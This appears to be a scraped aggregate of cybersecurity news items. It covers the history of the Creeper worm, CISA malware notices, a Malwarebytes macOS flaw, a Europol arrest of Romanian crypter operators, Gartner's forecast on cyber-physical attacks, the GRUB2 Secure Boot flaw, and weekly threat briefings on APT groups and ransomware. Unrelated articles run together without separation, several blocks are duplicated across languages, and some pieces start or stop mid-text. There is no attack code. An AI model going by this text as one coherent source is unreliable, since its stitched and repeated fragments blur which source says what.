According to the few trustworthy articles on the subject, which cite their sources[5,6], and explanations provided by Ray Tomlinson, who played a significant part in the story of Creeper[7,8], the program was created at BBN technologies at some point in 1971. At that time, BBN was developing the TENEX an operating system for the PDP-10 computer. One of the developers of TENEX was Robert Thomas, who, among other projects, worked on what was called a Resource Sharing Executive, or RSEXEC – an experiment with what was thought of as a “mobile application” concept. RSEXEC was basically supposed to enable a program to “jump” between computers in order for it to always be executed by a machine with unutilized computational resources or with data, which the program needed. As you’ve probably guessed, Creeper was the demonstration program, which resulted from Thomas’s work.

The original application was tested using (at most) 28 computers connected to the ARPANET and running the TENEX OS. Creeper migrated from one system to another, always “removing” itself from the machine, when it was leaving it. What is important to note is that this was done with full agreement and cooperation of operators of all those computers and that the test had no negative effects on them.
All that the Creeper supposedly did on “visited” computers was printing the famous message “I’M THE CREEPER : CATCH ME IF YOU CAN” on a teletype.

Message printed by Creeper[5]

An indeterminate amount of time later, Ray Tomlinson, who worked at BBN Technologies at the same time as Bob Thomas, created a modified version Creeper. The program originally jumped from one machine to another, which meant that there was always only one copy of it on the entire network (computer worms which behave in this way are sometimes called “rabbits”). The new version, which was created by Tomlinson, had the ability to replicate itself, i.e. create multiple copies of itself, which might exist at the same time on different machines (meaning it behaved more like a usual computer worm). This updated version was – once again – not malicious in any way and one may think of it as a demonstration of the concept of distributed computation more than anything else.

Since it was able to replicate itself and it was necessary to make sure it didn’t cause any problems even in case of bugs which might make it hang, Tomlinson also created a program called Reaper. This was a simple piece of code, which visited each of the approximately 28 computers, which might have hosted Creeper, and terminated any instances of Creeper it found running on them.

Due to this behavior, Reaper is sometimes called “the first anti-virus”[9]. Since neither version of Creeper was malicious in any way, depending on your definition of “anti-virus” this title may or may not be applicable. Reaper however almost certainly may be called the first “nematode” (a worm or virus, which removes another worm or virus from a system, on which it is present).

So, based on the history ve’we recounted, what may we say with any sort of certainty regarding the age of malware? Not much. In terms of the age of computer worms, however, chances are good that they really are really turning 50 this year, whether it is today or not. It is a little bit sad that one tends to think of every computer worm as being malicious “by default”, since, as this little trip down the memory lane shows us, it doesn’t necessarily have to be true…

In any case, if you’d like to learn a bit more about the origins of modern malware (and don’t mind low-quality video editing), the following video might be worth your time.


Jan Kopriva@jk0prAlef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.


Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.


An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.


Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures


ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.eu Romanians arrested for running underground malware servicessecurityaffairs.co Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.cl


Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.


Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas


ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.eu Romanians arrested for running underground malware servicessecurityaffairs.co Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.cl

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.


Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.



Read on:


Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .


Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

READ NEXTIIoT smart factories are leaving doors open for cyber attacks

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. Allegedly determined to be North Korean hackers, attempts have been thwarted but could easily have led to attacks that could devastate the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of ICS computers on its watch had been attacked by malicious malware at least once in the first half of 2018. 

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of incidents on cyber-physical security (CPS) are fortunately rare but set to rapidly increase in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong. 

Industrial robots are welding metal part in factory

Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”



IIoT smart factories are leaving doors open for cyber attacks

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Colbalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 916000.png

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

Android banking trojan, Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.Recommendation: Users should be cautious when downloading Android applications, with malicious apps occasionally bypassing Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies have been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola, Nintendo, among many others. Within the source code the developers’ names, along with hardcoded credentials have been found.Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, a misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity, and cause significant harm to a company’s reputation.Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records which included addresses birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell the breach on a hacker forum, however, they ended up releasing the database for free on another site.Recommendation: Dave is requiring all users to do a password reset, however, users need to be aware they are still at risk if they are using the same password for other sites as well.Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigations (FBI) and FireEye both have confirmed a series of campaigns by the Russian GRU associated APT28, aka Fancy Bear. These attacks began in December of 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spaying and brute force. The long term motivation behind these attacks is not clear, but are likely a variation of the past motives of APT28, including US election meddling, and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling as APT28 is believed to have been behind previous attacks against US and Ukrainian Energy infrastructure and Industry Control Systems (ICS).Recommendation: Defense in-depth, along with well designed and regular employee training is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store, this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used, arguably the servers have almost full control of a users phone exhibiting similarities to a malware C&C server. The app also uses auto-debugging and encryption techniques to stop security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and argued that the US DHS had found no evidence of suspicious data transmission.Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be, “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime,

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to North Korea based Lazarus APT group. The framework has been used by the threat actors since April 2018 and targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims like distributing VHD ransomware and querying victim databases for acquiring customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing as an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014 continuously using variants of MgBot throughout.Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks utilizing the tools from e-crime group Golden Chickens who provide Malware-as-a-Service (MaaS) throughout March and April. Researchers attributed each attack with confidence varying from low to moderate to groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and brute force implementation. Golden Chickens MaaS remains as a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.Recommendation: Financially themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191Tags: Terra loader, Golden chickens

MAR-17-352-01 HatMan—Safety System Targeted Malware. This malware analysis report discusses the components and capabilities of the HatMan malware and some potential mitigations. Media reporting also refers to this malware as both TRITON and TRISIS.

This updated malware analysis report is a follow-up to the updated malware analysis report titled MAR-17-352-01 HatMan – Safety System Targeted Malware (Updated A) that was published April 10, 2018, on the ICS-CERT website.

More malware designed for air-gapped systems. A British utility sustains a ransomware attack. The US Cyberspace Solarium Commission sees lessons in the pandemic for cybersecurity. Contact-tracing technologies take a step back,maybe a step or two forward. Rob Lee from Dragos comparing the state of ICS security around the world, our guest is Ian Pitt from LogMeIn on lessons learned working remotely during COVID-19. Criminals increase ransomware attacks on hospitals, and swap templates to impersonate government relief agencies.

For links to all of today’s stories check out our CyberWire daily news brief:

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Bugs, Exploit, Healthcare Attacks, Naikon, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 793547.pngFigure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Bugs in Two Related WordPress Plugins Together Risked Over 1 Million Websites

(published: May 10, 2020)

Two critical-severity WordPress plugin vulnerabilities have been identified by the Wordfence security team which could impact over a million WordPress websites. The two plugins affected are Elementor Pro and Ultimate Addons for Elementor, and the researchers have observed active exploitation of the vulnerabilities. Exploiting the Elementor Pro plugin allows for remote code execution attacks, granting a malicious actor the ability to gain full administrative access to WordPress if the site has open user registration. Websites with the “open user registration” option disabled can be exploited using the Ultimate Addons for Elementor registration bypass vulnerability. Developers behind both plugins have patched the flaws in Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2.Recommendation: Users of these WordPress plugins should ensure they are using Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2 or newer which include fixes to the vulnerabilities. All website owners, especially those using WordPress, should keep their installations and plugins up to date to ensure patches are installed as soon as they are available.Tags: Vulnerabilities, WordPress, Plugin, Registration bypass, Remote code execution

Hacker Group Floods Dark Web with Data Stolen From 11 Companies

(published: May 9, 2020)

The threat group known as Shiny Hunters are selling millions of user records for 11 different companies on an undisclosed dark web marketplace. The databases being sold include a combined total of 164.2 million user records, and have been steadily streamed to the marketplace since the beginning of May 2020. As of the time of this writing, the prices for each database ranges between $500 and $5,000 USD. The first reported database belongs to Tokopedia, an Indonesian online store, with over 90 million user records. The other companies reportedly involved are Bhinneka, ChatBooks, Chronicle Of Higher Education, Ggumim, HomeChef, Mindful, Minted, StarTribune, Styleshare, and Zoosk. The affected companies have been contacted by Bleeping Computer, as the data breaches appear legitimate, despite not being 100% confirmed.Recommendation: Individuals that have accounts with any of the impacted companies are strongly advised to change their login credentials immediately. Additionally, it is important to not reuse passwords for multiple sites and services. If the same credentials are used on any other sites, it is suggested that those accounts also be updated with new, unique passwords.Tags: Data breach, Shiny Hunters, Dark web marketplace

Naikon APT: Cyber Espionage Reloaded

(published: May 7, 2020)

Check Point Research have discovered evidence that the Advanced Persistent Threat (APT) group known as “Naikon” have been persistently targeting national government agencies in the Asia Pacific region since 2015 as part of a cyber-espionage campaign. Naikon APT has been using a new type of Remote Access Trojan (RAT) called “Aria-body” as a backdoor into government networks, targeting ministries of foreign affairs, science, and technology in Australia, Brunei, Indonesia, Myanmar, Philippines, Thailand, and Vietnam. Aria-body infects the network and servers of one target, and then uses the compromised infrastructure to launch new attacks, exploiting the trust between departments and governments to increase the chances of success, according to the Check Point report. Naikon threat actors use several different infection methods to deliver the Aria-body RAT, including malicious emails containing a Rich Text Format (RTF) file weaponized with “RoyalRoad” exploit builder malware, or directly via a legitimate executable file, which serves as a loader. These methods are aimed at personnel within target organizations to be able to use the compromised servers to more effectively infiltrate new agencies. According to reports by Kaspersky, ThreatConnect, and Defense Group Inc. in 2015, Niakon is believed to be Chinese-speaking and associated with China’s People’s Liberation Army (PLA) intelligence operations.Recommendation: This Naikon campaign is highly targeted, therefore, it is likely that actors are impersonating government employees or agencies in spearphishing emails. All employees should be educated on the risk of opening attachments or following links received from unknown or unexpected senders. Anti-spam and antivirus protection should be implemented and kept up-to-date with the latest version to better ensure security.MITRE ATT&CK: [MITRE ATT&CK] Spearphishing 